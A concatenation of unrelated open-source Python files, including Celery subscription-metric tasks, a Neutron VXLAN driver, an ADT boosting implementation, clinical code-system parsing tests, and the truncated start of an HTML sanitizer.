globs = globals() # execute globals() outside for loop for efficiency
for metric in settings.METRICS_SCHEDULED_TASKS:
globs[metric].apply_async()
return "%d Scheduled metrics launched" % len(settings.METRICS_SCHEDULED_TASKS)
scheduled_metrics = ScheduledMetrics()
class FireWeekEstimateLast(Task):
"""Fires week estimated send counts.
"""
name = "subscriptions.tasks.fire_week_estimate_last"
def run(self):
schedules = Schedule.objects.filter(
subscriptions__active=True,
subscriptions__completed=False,
subscriptions__process_status=0,
).annotate(total_subs=Count("subscriptions"))
totals = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
for schedule in schedules:
for day in range(7):
if str(day) in schedule.day_of_week or "*" in schedule.day_of_week:
totals[day] = totals[day] + schedule.total_subs
# Django's datetime's weekday method has Monday = 0
# whereas the cron format used in the schedules has Sunday = 0
sunday = totals.pop(0)
totals[7] = sunday
totals = {(k - 1): v for k, v in totals.items()}
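        # e.g. cron day 0 (Sunday) ends up under key 6, matching
        # datetime.weekday() where Monday == 0 and Sunday == 6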
today = now()
for dow, total in totals.items():
# Only fire the metric for today or days in the future so that
# estimates for the week don't get updated after the day in
# question.
if dow >= (today.weekday()):
fire_metric.apply_async(
kwargs={
"metric_name": "subscriptions.send.estimate.%s.last" % dow,
"metric_value": total,
}
)
fire_week_estimate_last = FireWeekEstimateLast()
class FireDailySendEstimate(Task):
"""Fires daily estimated send counts.
"""
name = "subscriptions.tasks.fire_daily_send_estimate"
def run(self):
# Django's datetime's weekday method has Monday = 0
# whereas the cron format used in the schedules has Sunday = 0
day = now().weekday() + 1
schedules = (
Schedule.objects.filter(
Q(day_of_week__contains=day) | Q(day_of_week__contains="*"),
subscriptions__active=True,
subscriptions__completed=False,
subscriptions__process_status=0,
)
.values("subscriptions__messageset")
.annotate(
total_subs=Count("subscriptions"),
total_unique=Count("subscriptions__identity", distinct=True),
)
)
for schedule in schedules:
EstimatedSend.objects.get_or_create(
send_date=now().date(),
messageset_id=schedule["subscriptions__messageset"],
estimate_subscriptions=schedule["total_subs"],
estimate_identities=schedule["total_unique"],
)
fire_daily_send_estimate = FireDailySendEstimate()
class RequeueFailedTasks(Task):
"""
Task to requeue failed schedules.
"""
name = "subscriptions.tasks.requeue_failed_tasks"
def run(self, **kwargs):
log = self.get_logger(**kwargs)
failures = SubscriptionSendFailure.objects
log.info(
"Attempting to requeue <%s> failed Subscription sends"
% failures.all().count()
)
for failure in failures.iterator():
subscription_id = str(failure.subscription_id)
# Cleanup the failure before requeueing it.
failure.delete()
send_next_message.delay(subscription_id)
requeue_failed_tasks = RequeueFailedTasks()
@app.task
def calculate_subscription_lifecycle(subscription_id):
"""
Calculates the expected lifecycle position the subscription in
subscription_ids, and creates a BehindSubscription entry for them.
Args:
subscription_id (str): ID of subscription to calculate lifecycle for
"""
subscription = Subscription.objects.select_related("messageset", "schedule").get(
id=subscription_id
)
behind = subscription.messages_behind()
if behind == 0:
return
current_messageset = subscription.messageset
current_sequence_number = subscription.next_sequence_number
end_subscription = Subscription.fast_forward_lifecycle(subscription, save=False)[-1]
BehindSubscription.objects.create(
subscription=subscription,
messages_behind=behind,
current_messageset=current_messageset,
current_sequence_number=current_sequence_number,
expected_messageset=end_subscription.messageset,
expected_sequence_number=end_subscription.next_sequence_number,
)
@app.task
def find_behind_subscriptions():
"""
Finds any subscriptions that are behind according to where they should be,
and creates a BehindSubscription entry for them.
"""
subscriptions = Subscription.objects.filter(
active=True, completed=False, process_status=0
).values_list("id", flat=True)
for subscription_id in subscriptions.iterator():
calculate_subscription_lifecycle.delay(str(subscription_id))
| praekelt/seed-stage-based-messaging | subscriptions/tasks.py | Python | bsd-3-clause | 21,273 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
from django.contrib.auth.models import AbstractUser
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class User(AbstractUser):
# First Name and Last Name do not cover name patterns
# around the globe.
name = models.CharField(_("Name of User"), blank=True, max_length=255)
test = models.CharField("test", blank=True, max_length=255)
def __str__(self):
return self.username
def get_absolute_url(self):
return reverse('users:detail', kwargs={'username': self.username})
| show0k/ressources_management_django | flowers_ressources_management/users/models.py | Python | gpl-3.0 | 766 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from shuup.admin.utils.picotable import Column, TextFilter
from shuup.admin.utils.views import PicotableListView
from shuup.core.models import ServiceProvider
class ServiceProviderListView(PicotableListView):
model = ServiceProvider
default_columns = [
Column(
"name",
_("Name"),
sort_field="base_translations__name",
filter_config=TextFilter(filter_field="base_translations__name", placeholder=_("Filter by name...")),
),
Column("type", _("Type"), display="get_type_display", sortable=False),
]
toolbar_buttons_provider_key = "service_provider_list_toolbar_provider"
mass_actions_provider_key = "service_provider_mass_actions_provider"
def get_type_display(self, instance):
return instance._meta.verbose_name.capitalize()
def get_object_abstract(self, instance, item):
return [
{"text": "%s" % instance, "class": "header"},
{"text": self.get_type_display(instance)},
]
| shoopio/shoop | shuup/admin/modules/service_providers/views/_list.py | Python | agpl-3.0 | 1,374 |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from oslo.db import exception as db_exc
from six import moves
import sqlalchemy as sa
from sqlalchemy import sql
from neutron.common import exceptions as n_exc
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.i18n import _LE, _LW
from neutron.openstack.common import log
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2.drivers import type_tunnel
LOG = log.getLogger(__name__)
VXLAN_UDP_PORT = 4789
MAX_VXLAN_VNI = 16777215
vxlan_opts = [
cfg.ListOpt('vni_ranges',
default=[],
help=_("Comma-separated list of <vni_min>:<vni_max> tuples "
"enumerating ranges of VXLAN VNI IDs that are "
"available for tenant network allocation")),
cfg.StrOpt('vxlan_group',
help=_("Multicast group for VXLAN. If unset, disables VXLAN "
"multicast mode.")),
]
cfg.CONF.register_opts(vxlan_opts, "ml2_type_vxlan")
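# Example ml2_conf.ini stanza matching these options (values illustrative):
#   [ml2_type_vxlan]
#   vni_ranges = 1001:2000,30000:39999
#   vxlan_group = 239.1.1.1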
class VxlanAllocation(model_base.BASEV2):
__tablename__ = 'ml2_vxlan_allocations'
vxlan_vni = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sql.false(), index=True)
class VxlanEndpoints(model_base.BASEV2):
"""Represents tunnel endpoint in RPC mode."""
__tablename__ = 'ml2_vxlan_endpoints'
__table_args__ = (
sa.UniqueConstraint('host',
name='unique_ml2_vxlan_endpoints0host'),
)
ip_address = sa.Column(sa.String(64), primary_key=True)
udp_port = sa.Column(sa.Integer, nullable=False)
host = sa.Column(sa.String(255), nullable=True)
def __repr__(self):
return "<VxlanTunnelEndpoint(%s)>" % self.ip_address
class VxlanTypeDriver(type_tunnel.TunnelTypeDriver):
def __init__(self):
super(VxlanTypeDriver, self).__init__(VxlanAllocation)
def get_type(self):
return p_const.TYPE_VXLAN
def initialize(self):
try:
self._initialize(cfg.CONF.ml2_type_vxlan.vni_ranges)
except n_exc.NetworkTunnelRangeError:
LOG.exception(_LE("Failed to parse vni_ranges. "
"Service terminated!"))
raise SystemExit()
def sync_allocations(self):
# determine current configured allocatable vnis
vxlan_vnis = set()
for tun_min, tun_max in self.tunnel_ranges:
if tun_max + 1 - tun_min > MAX_VXLAN_VNI:
LOG.error(_LE("Skipping unreasonable VXLAN VNI range "
"%(tun_min)s:%(tun_max)s"),
{'tun_min': tun_min, 'tun_max': tun_max})
else:
vxlan_vnis |= set(moves.xrange(tun_min, tun_max + 1))
session = db_api.get_session()
with session.begin(subtransactions=True):
# remove from table unallocated tunnels not currently allocatable
# fetch results as list via all() because we'll be iterating
# through them twice
allocs = (session.query(VxlanAllocation).
with_lockmode("update").all())
# collect all vnis present in db
existing_vnis = set(alloc.vxlan_vni for alloc in allocs)
# collect those vnis that needs to be deleted from db
vnis_to_remove = [alloc.vxlan_vni for alloc in allocs
if (alloc.vxlan_vni not in vxlan_vnis and
not alloc.allocated)]
# Immediately delete vnis in chunks. This leaves no work for
# flush at the end of transaction
bulk_size = 100
chunked_vnis = (vnis_to_remove[i:i + bulk_size] for i in
range(0, len(vnis_to_remove), bulk_size))
for vni_list in chunked_vnis:
session.query(VxlanAllocation).filter(
VxlanAllocation.vxlan_vni.in_(vni_list)).delete(
synchronize_session=False)
# collect vnis that need to be added
vnis = list(vxlan_vnis - existing_vnis)
chunked_vnis = (vnis[i:i + bulk_size] for i in
range(0, len(vnis), bulk_size))
for vni_list in chunked_vnis:
bulk = [{'vxlan_vni': vni, 'allocated': False}
for vni in vni_list]
session.execute(VxlanAllocation.__table__.insert(), bulk)
def get_endpoints(self):
"""Get every vxlan endpoints from database."""
LOG.debug("get_vxlan_endpoints() called")
session = db_api.get_session()
vxlan_endpoints = session.query(VxlanEndpoints)
return [{'ip_address': vxlan_endpoint.ip_address,
'udp_port': vxlan_endpoint.udp_port,
'host': vxlan_endpoint.host}
for vxlan_endpoint in vxlan_endpoints]
def get_endpoint_by_host(self, host):
LOG.debug("get_endpoint_by_host() called for host %s", host)
session = db_api.get_session()
return (session.query(VxlanEndpoints).
filter_by(host=host).first())
def get_endpoint_by_ip(self, ip):
LOG.debug("get_endpoint_by_ip() called for ip %s", ip)
session = db_api.get_session()
return (session.query(VxlanEndpoints).
filter_by(ip_address=ip).first())
def add_endpoint(self, ip, host, udp_port=VXLAN_UDP_PORT):
LOG.debug("add_vxlan_endpoint() called for ip %s", ip)
session = db_api.get_session()
try:
vxlan_endpoint = VxlanEndpoints(ip_address=ip,
udp_port=udp_port,
host=host)
vxlan_endpoint.save(session)
except db_exc.DBDuplicateEntry:
vxlan_endpoint = (session.query(VxlanEndpoints).
filter_by(ip_address=ip).one())
LOG.warning(_LW("Vxlan endpoint with ip %s already exists"), ip)
return vxlan_endpoint
def delete_endpoint(self, ip):
LOG.debug("delete_vxlan_endpoint() called for ip %s", ip)
session = db_api.get_session()
with session.begin(subtransactions=True):
session.query(VxlanEndpoints).filter_by(ip_address=ip).delete()
| blueboxgroup/neutron | neutron/plugins/ml2/drivers/type_vxlan.py | Python | apache-2.0 | 7,094 |
from nav.ipdevpoll.plugins import typeoid
def test_make_new_vendor_id_has_reasonable_response():
sysobjectid = '1.3.6.1.4.1.11.2.3.7.11.51'
assert typeoid.make_new_vendor_id(sysobjectid) == 'hewlettpackard'
| sigmunau/nav | tests/unittests/ipdevpoll/typeoid_test.py | Python | gpl-2.0 | 217 |
import numpy as np
import scipy.weave as weave
import scipy.stats.stats as stats
import cPickle
import os, time
import pdb
# machine epsilon
EPS = np.finfo(np.double).tiny
# sum function that maintains array shape length
sum = lambda x,axes: np.apply_over_axes(np.sum,x,axes)
prod = lambda x,y: x*y
class ADT(dict):
"""A dictionary to store the Alternating Decision Tree model.
An Alternating Decision Tree contains decision nodes and
output nodes. Decision nodes are implemented as a `Node`
class in this module. In the ADT dictionary, keys correspond
to the boosting round in which the node is added and can be
used as a numeric identifier for that decision node. Values
are lists containing an instance of the decision node and
associated output nodes. Adding a child node reveals only
inheritance from its immediate parent.
The ADT is initialized by passing the attributes of the Root
Node.
Arguments
alpha : float
weight of the root node (bias term in the ADT model).
v : array
vote vector of the root node
"""
def __init__(self, alpha, v):
self[-1] = [Node(name='Root'), [alpha, v, []]]
def add_decision_node(self, id, name, threshold):
"""Add a decision node to the ADT.
Arguments
id : int
boosting round in which the node is added.
name : str
string identifying the feature associated with the
decision node.
threshold : float
the threshold on the set of values of the feature
associated with the decision node
"""
self[id] = [Node(name=name, threshold=threshold), [], []]
def add_output_node(self, id, alpha, v, output_type=0):
"""Add an output node to the ADT.
Arguments
id : int
boosting round in which the node is added.
alpha : float
weight of the binary-valued function associated with
the output node
v : int array
vote vector of the binary-valued function associated
with the output node
Kwargs
output_type : {0,1}
this determines which of the two output nodes is
being added
.. note::
There are two output nodes for each decision node, corresponding
to the two binary-valued functions :math:`\psi` and :math:`\\tilde{\psi}`
(see `paper <http://arxiv.org/abs/1105.5821>`_ for details). The
parameter `output_type` determines which of these two output
nodes is being added to the model.
"""
self[id][output_type+1] = [alpha, v, []]
def add_child(self, parent, child, output_type=0):
"""Append the new decision node as a child of an existing parent
node.
Arguments
parent : int
node identifier of the parent decision node to which new
decision node is being added.
child : int
node identifier of the new decision node.
Kwargs
output_type : {0,1}
this determines to which of the two output nodes of the
parent decision node is the new decision node being added.
"""
try:
self[parent][output_type+1][2].append(child)
except IndexError:
print (parent, output_type, self[parent])
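# Usage sketch (illustrative values): each boosting round adds one decision
# node plus its two output nodes, then wires the decision node to a parent.
#   v = np.ones((3, 1))                             # vote vector, L=3 classes
#   adt = ADT(0.1, v)                               # root / bias term
#   adt.add_decision_node(0, 'AAGT', 2.0)           # round-0 node on a kmer
#   adt.add_output_node(0, 0.5, v, output_type=0)   # psi ("yes") output
#   adt.add_output_node(0, 0.3, -v, output_type=1)  # psi-tilde ("no") output
#   adt.add_child(-1, 0)                            # attach under the root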
class Node:
"""A class to hold attributes of decision nodes in an ADT.
Kwargs
name : str
string identifying the feature associated with the
decision node.
threshold : int or float
the threshold on the set of values of the feature
associated with the decision node
"""
def __init__(self, name=None, threshold=None):
if name:
self.name = name
else:
self.name = 'Root'
if threshold:
self.threshold = threshold
def adaboost(X, Y, x, y, T, output_file=None, kmer_dict=None, \
model='stump', predicted_labels=None, test_indices=None):
"""This function runs Adaboost, given some training and
testing data.
Arguments
X : float array
Training data where rows correspond to features
and columns to samples.
Y : float array
Training labels where rows correspond to labels
and columns to samples. This is an array of {1,-1}.
x : float array
Testing data with similar row,column properties
as training data.
y : float array
Testing labels with similar row,column properties
as training labels.
T : int
Number of boosting rounds
Kwargs
output_file : str
A full file path to which results can be written
during code execution. If not provided, the code
creates a results directory one level up and writes
to it.
kmer_dict : dict
A dictionary with row indices of data as keys and
some application relevant identifier of the row
as value. Values should be strings.
model : {**tree**, stump}
ADT model type
* tree = full ADT
* stump = ADT with depth 1
Returns
adt : ADT instance
The final ADT model.
performance : array
An array containing train/test accuracy of the model
at each boosting round, along with runtime for each
round.
.. note::
* D kmers
* N virus sequences
* L Host Classes
`phi[label]` dictionary stores outputs of each binary function
and the inheritance of each decision node. Its values
contain a function :math:`\psi` (:math:`1 \\times N` array),
a scalar :math:`\\alpha`, and a vote vector `v` (:math:`L \\times 1`
array). Their product is a :math:`L \\times N`
array which represents the contribution of the new
output node to the total classification of each object.
f is a rank 3 array (:math:`L \\times N \\times T+1`) that
stores the output of the ADT for each virus sequence at each round
of boosting.
Anil Raj, Michael Dewar, Gustavo Palacios, Raul Rabadan, Chris Wiggins.
Identifying Hosts of Families of Viruses: a Machine Learning Approach
arXiv:1105.5821v1 [q-bio.QM] 29 May 2011
"""
(D,N) = X.shape
L = Y.shape[0]
n = x.shape[1]
if test_indices:
test_indices.sort()
# create output file, if not provided
# create a data directory, one level above
if not output_file:
        cwd = os.getcwd().split(os.sep)[:-1]
        # list.extend() returns None, so build the paths by concatenation
        data_dir = os.sep.join(cwd + ['data'])
        output_file = os.sep.join(cwd + ['data', 'output.txt'])
        if not os.path.exists(data_dir):
            os.makedirs(data_dir)
# Initialize data structures to store model and output
performance = np.zeros((T+1,5),dtype=float)
# Each example has equal weight of 1/NL
w = np.ones(Y.shape,dtype=float)/(N*L)
# phi stores the output of each binary-valued function
# for train and test data
phi = {'train': dict(), 'test': dict()}
# f = output of the ADT at each round, for train & test data
f = {'train': np.zeros((L,N,T+1), dtype=float),
'test': np.zeros((L,n,T+1), dtype=float)}
starttime = time.time()
# v = vote vector
v = (sum((w*Y),[1])>0)*2.-1.
# compute cumulative weights
Wplus = w[Y*v>0].sum()
Wminus = w[Y*v<0].sum()
# alpha = coefficient of weak rule
alpha = 0.5*np.log((Wplus+EPS)/(Wminus+EPS))
# alpha is kept positive
#vote vector captures the sign of the rule coefficient
if alpha<0:
alpha = np.abs(alpha)
v = -1*v
# update phi dictionary. Array represents \psi
phi['train'][-1] = [[np.ones((1,N),dtype=float),alpha,v]]
phi['test'][-1] = [[np.ones((1,n),dtype=float),alpha,v]]
# initialize ADT
adt = ADT(alpha,v)
# compute the prediction of the ADT for all train/test samples
# train/test (keys), data dictionary (values)
for label,data in phi.items():
# data.values() has one output node with a list [\psi, v and \alpha]
for node in data.values():
# child(ren) are \psi, v, \alpha
for child in node:
# Entries of product represent the contribution of the new weak
# rule to the classification of each virus.
f[label][:,:,0] += reduce(prod,child)
# updated weights
w = np.exp(-f['train'][:,:,0]*Y)
w = w/w.sum()
# compute classification error at round 0
performance[0,:4] = compute_auc(f['train'][:,:,0],f['test'][:,:,0],Y,y)
performance[0,4] = time.time() - starttime
# write intermediate output to file
handle = open(output_file,'a')
to_write = [-1, 'root', 'None']
to_write.extend(list(performance[0,:]))
handle.write('\t'.join(map(str,to_write))+'\n')
handle.close()
# starting boosting rounds
for t in range(T):
starttime = time.time()
# choose the appropriate (path,feature) for the next binary-valued function
path, feature, decision, threshold \
= get_new_function(X, Y, phi['train'], w, model)
# slices the feature space to an array which represents the kmer feature the
# new weak rule has picked. Returns a 1xN array of {True, False}
PX = X[feature:feature+1,:]<threshold
px = x[feature:feature+1,:]<threshold
phi['train'][t] = []
phi['test'][t] = []
adt.add_decision_node(t, kmer_dict[feature], threshold)
adt.add_child(path, t, decision)
# iterates over the two output nodes that a decision node can have.
# 0 indicates a "yes" output and 1 indicates a "no" output.
for ans in [0,1]:
# compute output of decision function
# the train_phi is based on its value prior to decision round t
train_phi = phi['train'][path][decision][0] * (ans+(-1.)**ans*PX)
test_phi = phi['test'][path][decision][0] * (ans+(-1.)**ans*px)
# calculate optimal value of (alpha,v) for the new
# binary-valued function
v = (sum(w*Y*train_phi,[1])>0)*2.-1.
Wplus = w[Y*v*train_phi>0].sum()
Wminus = w[Y*v*train_phi<0].sum()
alpha = 0.5*np.log((Wplus+EPS)/(Wminus+EPS))
# alpha is always kept positive
if alpha<0:
alpha = np.abs(alpha)
v = -1*v
# Update Tree and prediction dictionary
phi['train'][t].append([train_phi,alpha,v])
phi['test'][t].append([test_phi,alpha,v])
adt.add_output_node(t, alpha, v)
# compute the prediction of the ADT for all train/test samples
# train/test (keys), data dictionary (values)
for label,data in phi.items():
# data.values() has two output nodes with each with a list [\psi, v and \alpha]
for node in data.values():
# child(ren) are \psi, v, \alpha
for child in node:
# Entries of product represent the contribution of the new weak
# rule to the classification of each virus.
f[label][:,:,t+1] += reduce(prod,child)
# updated weights
w = np.exp(-f['train'][:,:,t+1]*Y)
w = w/w.sum()
# compute the test / train AUC and test / train classification errors
performance[t+1,:4] = compute_auc(f['train'][:,:,t+1], f['test'][:,:,t+1], Y, y)
predicted_labels[test_indices,t] = f['test'][:,:,t+1].argmax(0)
performance[t+1,4] = time.time() - starttime
# output data
handle = open(output_file,'a')
to_write = [t, kmer_dict[feature], threshold]
to_write.extend(list(performance[t+1,:]))
handle.write('\t'.join(map(str,to_write))+'\n')
handle.close()
return adt, f, performance, predicted_labels
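# Invocation sketch (illustrative shapes): D=500 kmers, N=80 training and
# n=20 test sequences, L=4 host classes; labels are +/-1 indicator arrays.
#   kmers = {i: 'kmer%d' % i for i in range(500)}
#   pred = -np.ones((100, 20))
#   adt, f, perf, pred = adaboost(X, Y, x, y, T=20,
#                                 output_file='results.txt', kmer_dict=kmers,
#                                 model='stump', predicted_labels=pred,
#                                 test_indices=range(80, 100))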
def compute_auc(train, test, Y, y):
"""Computes measures of accuracy for train and test data.
Computes the ROC curve and the area under that curve, as a
measure of classification accuracy. The threshold corresponding
to the point on the ROC curve farthest from `y=x` line is selected
and fraction of correct predictions corresponding to that
threshold is returned.
Arguments
train : float array
Array of predictions of the model on training data where rows
correspond to labels and columns correspond to samples.
test : float array
Array of predictions of the model on testing data where rows
correspond to labels and columns correspond to samples.
Y : float array
Training labels where rows correspond to labels
and columns to samples. This is an array of {1,-1}.
y : float array
Testing labels where rows correspond to labels
and columns to samples. This is an array of {1,-1}.
Returns
performance : float array
Array containing the AUC for training data, classification
accuracy for training data, AUC for testing data and
classification accuracy for testing data, in that order.
.. note::
* For binary-class classification, AUC is proportional to the Mann-Whitney U test statistic which computes a measure of the separation between values of positive labels and negative labels.
* For multi-class classification, this formula for computing classifier AUC is one of many. A more principled way would involve computing the Volume under an ROC surface.
"""
# computing train AUC
NP = (Y==1).sum()
NM = (Y==-1).sum()
try:
U = stats.mannwhitneyu(train[(Y==1)],train[(Y==-1)])
train_auc = 1.-U[0]/(NP*NM)
except ValueError:
train_auc = 0.5
# computing test AUC
NP = (y==1).sum()
NM = (y==-1).sum()
try:
U = stats.mannwhitneyu(test[(y==1)],test[(y==-1)])
test_auc = 1.-U[0]/(NP*NM)
except ValueError:
test_auc = 0.5
# accuracy = number of examples where argmax of prediction
# equals true label
# train accuracy
train_accuracy = (train.argmax(0)-Y.argmax(0)==0).sum()/float(Y.shape[1])
# test accuracy
test_accuracy = (test.argmax(0)-y.argmax(0)==0).sum()/float(y.shape[1])
return np.array([train_auc, train_accuracy, test_auc, test_accuracy])
def get_new_function(X, Y, phi, w, model='tree'):
"""This function finds the best feature to add to an ADT.
This function computes the minimum exponential loss achieved
by each potential decision node and selects the one that
has the least exponential loss.
Arguments
X : float array
Data array where rows correspond to features and columns
correspond to samples.
Y : int array
Label array where rows correspond to labels and columns
correspond to samples. Entries in this matrix should only
be +1 or -1.
phi : dict
Dictionary of outputs of binary-valued functions in an
ADT (i.e., value of samples at the ADT's output nodes).
See parent function `Adaboost` for details on keys and
values.
w : float array
Array of weights over samples where rows correspond to
labels and columns correspond to samples.
Kwargs
model : {**tree**,stump}
Returns
path : int
Index of the decision node to which the new feature
should be connected in the ADT.
feature : int
Row index of data matrix `X` that corresponds to the
selected feature.
decision : {0,1}
Output node of the decision node `path` to which the
decision node corresponding to the new feature should be
connected.
threshold : int or float
Threshold attribute of the decision node for the selected
feature.
.. note::
* D kmers
* N virus sequences
* L Host Classes
.. warning::
* The code builds a list of all possible threshold values from the entire data matrix. This is a bad idea if the data matrix has too many possible values.
* The C code expects the arrays passed to be in C contiguous order. This needs to be generalized, using strides, since simple operations (like transposing) can change the array to Fortran contiguous. Click this `link <http://stackoverflow.com/ questions/4420622/how-to-account-for-column-contiguous-array-when-extending-numpy-with-c>`_ to see how to do this.
"""
(D,N) = X.shape
K = Y.shape[0]
if model=='tree':
keys = phi.keys()
keys.sort()
phi_array = np.array([output_node[0][0] for round in keys for output_node in phi[round]])
order = [[key,key] for key in keys]
order = [p for ps in order for p in ps]
order.pop(0)
    elif model=='stump':
        # decision stumps attach every new rule to the root, so only the
        # root's (all-ones) output function is a candidate parent path here;
        # this also defines `order`, which was otherwise unbound for stumps
        phi_array = np.array([output_node[0][0] for output_node in phi[-1]])
        order = [-1]
# `Z` holds the loss for each decision rule `phi` being tested
Z = np.zeros((phi_array.shape[0],D),dtype=float)
thresholds = np.unique(X[:])
results = np.zeros((3,),dtype='int')
# parse the C code from get_new_function.c
#f = open(os.cwd()+'get_new_function.c','r')
f = open('get_new_function.c','r')
C_code = '\n'.join([line for line in f if '//' not in line])
f.close()
support_code = "#include <math.h>"
# the python code that calls the C code using weave.inline
weave.inline(C_code, ['X','Y','phi_array','w','thresholds','results','Z'], \
support_code=support_code, verbose=2, compiler='gcc')
path = order[results[0]]
feature = results[1]
if results[0]:
decision = 1-results[0]%2
else:
decision = 0
threshold = results[2]
return path, feature, decision, threshold
| rajanil/mkboost | src/boost.py | Python | mit | 18,517 |
# coding: utf-8
from nose.tools import assert_equal # @UnresolvedImport
from clinvoc.icd10 import ICD10CM, ICD10PCS
from clinvoc.icd9 import ICD9CM, ICD9PCS
from clinvoc.ubrev import UBREV
from clinvoc.hcpcs import HCPCS, HCPCSModifier
from clinvoc.ndc import NDC
from clinvoc.loinc import LOINC
def test_icd10_cm_no_decimals():
vocab = ICD10CM(use_decimals=False, match_terminal_only=True)
assert_equal(vocab.standardize('A150'), 'A15.0')
def test_icd10_cm():
vocab = ICD10CM(match_terminal_only=True)
assert_equal(vocab.parse('‘Z00.00’, ‘Z00.01’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse('‘Z00.00-Z00.01’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse('‘Z00.00-Z00.0*’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse('‘Z00.0*-Z00.0*’, ‘Z00.121’, ‘Z00.129’, ‘Z00.8’'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
assert_equal(vocab.parse(' Z00.00 "Z00.01" Z00.121 Z00.129 Z00.8'),
{'Z00.00', 'Z00.01', 'Z00.121', 'Z00.129', 'Z00.8'})
def test_icd10_pcs():
vocab = ICD10PCS(match_terminal_only=True, use_leading_zeros=True)
assert_equal(vocab.parse("'0210093', '0210098', '0210099', '0211093', '0211098'"),
{'021.0093', '021.0098', '021.0099', '021.1093', '021.1098'})
assert_equal(vocab.parse("'0210093', '0210098 - 0210099', '0211093', '0211098'"),
{'021.0093', '021.0098', '021.0099', '021.1093', '021.1098'})
assert_equal(vocab.parse('0DV68DZ'), {'0DV.68DZ'})
vocab = ICD10PCS(match_terminal_only=True, use_decimals=True)
assert_equal(vocab.parse("'21.0093', '021.009*', '21.1093', '021.1098'"),
{'021.0093', '021.0098', '021.0099', '021.1093', '021.1098', '021.009C',
'021.009F', '021.009W'})
def test_icd10_union():
vocab = ICD10CM(match_terminal_only=True) | ICD10PCS(match_terminal_only=True, use_leading_zeros=True)
assert_equal(vocab.parse("'0210093', ‘Z00.121’"), set(['021.0093', 'Z00.121']))
def test_icd9_cm():
vocab = ICD9CM(match_terminal_only=True)
assert_equal(vocab.parse("250.33, 250.40, 250.41, 250.42, 250.43,"),
{'250.33', '250.40', '250.41', '250.42', '250.43'})
assert_equal(vocab.parse("250.33, 250.40-250.43,"),
{'250.33', '250.40', '250.41', '250.42', '250.43'})
assert_equal(vocab.parse("250.33, 250.4*,"),
{'250.33', '250.40', '250.41', '250.42', '250.43'})
assert_equal(vocab.parse('42'), {'042'})
def test_icd9_pcs():
vocab = ICD9PCS(match_terminal_only=True)
assert_equal(vocab.parse("'79.27', '79.33', '79.37', '79.63', '79.67'"),
{'79.27', '79.33', '79.37', '79.63', '79.67'})
assert_equal(vocab.parse("'79.37', '79.33'-'79.37', '79.63', '79.67'"),
{'79.33', '79.37', '79.63', '79.67', '79.36', '79.34', '79.35'})
assert_equal(vocab.parse("'79.37', '79.3*', '79.63', '79.67'"),
{'79.33', '79.37', '79.63', '79.67', '79.36', '79.34', '79.35',
'79.32', '79.39', '79.30', '79.31', '79.38'})
def test_ubrev():
vocab = UBREV()
assert_equal(vocab.parse('116'),
{'0116'})
assert_equal(vocab.parse('116-118'),
{'0116', '0117', '0118'})
def test_loinc():
vocab = LOINC()
assert_equal(vocab.parse('10037-*-10038-8, 1-1'),
{'10037-0', '10038-8', '00001-1'})
def test_hcpcs():
vocab = HCPCS()
assert_equal(vocab.parse("'99377', '99378', 'G0182', 'G9473', 'G9474-G9477'"),
{'99377', '99378', 'G0182', 'G9473', 'G9474', 'G9475', 'G9476', 'G9477'})
assert_equal(vocab.parse("'99377-99378', 'G0182', 'G9473', 'G9474'"),
{'99377', '99378', 'G0182', 'G9473', 'G9474'})
assert_equal(vocab.parse("'99377 - 99378', 'G0182', 'G9473 -G9474'"),
{'99377', '99378', 'G0182', 'G9473', 'G9474'})
assert_equal(vocab.parse("'G947*'"),
{'G9470', 'G9471', 'G9472', 'G9473', 'G9474', 'G9475', 'G9476', 'G9477',
'G9478', 'G9479', 'G947T', 'G947U', 'G947F', 'G947M'})
def test_hcpcs_modifier():
vocab = HCPCSModifier()
assert_equal(vocab.parse('G6, G7'), {'G6', 'G7'})
def test_ndc():
vocab = NDC()
assert_equal(vocab.parse('\'10928-252-3\' , 91201792718'), {'10928025203', '91201792718'})
if __name__ == '__main__':
import sys
import nose
# This code will run the test in this file.'
module_name = sys.modules[__name__].__file__
result = nose.run(argv=[sys.argv[0],
module_name,
'-s', '-v']) | jcrudy/clinvoc | clinvoc/test/test_code_systems.py | Python | mit | 4,969 |
from bs4 import BeautifulSoup
import re
def sanitize(html):
# allow these tags. Other tags are removed, but their child elements remain
whitelist = ['em', 'i', 'strong', 'u', 'a', 'b', 'p', 'br', 'code', 'pre', 'table', 'tr', 'td' ]
# allow only these attributes on these tags. No other tags are allowed any
# attributes.
attr_whitelist = { 'a':['href','title','hreflang']}
# remove these tags, complete with contents.
blacklist = [ 'script', 'style' ]
attributes_with_urls = [ 'href', 'src' ]
# BeautifulSoup is catching out-of-order and unclosed tags, so markup
# can't leak out of comments and break the rest of the page.
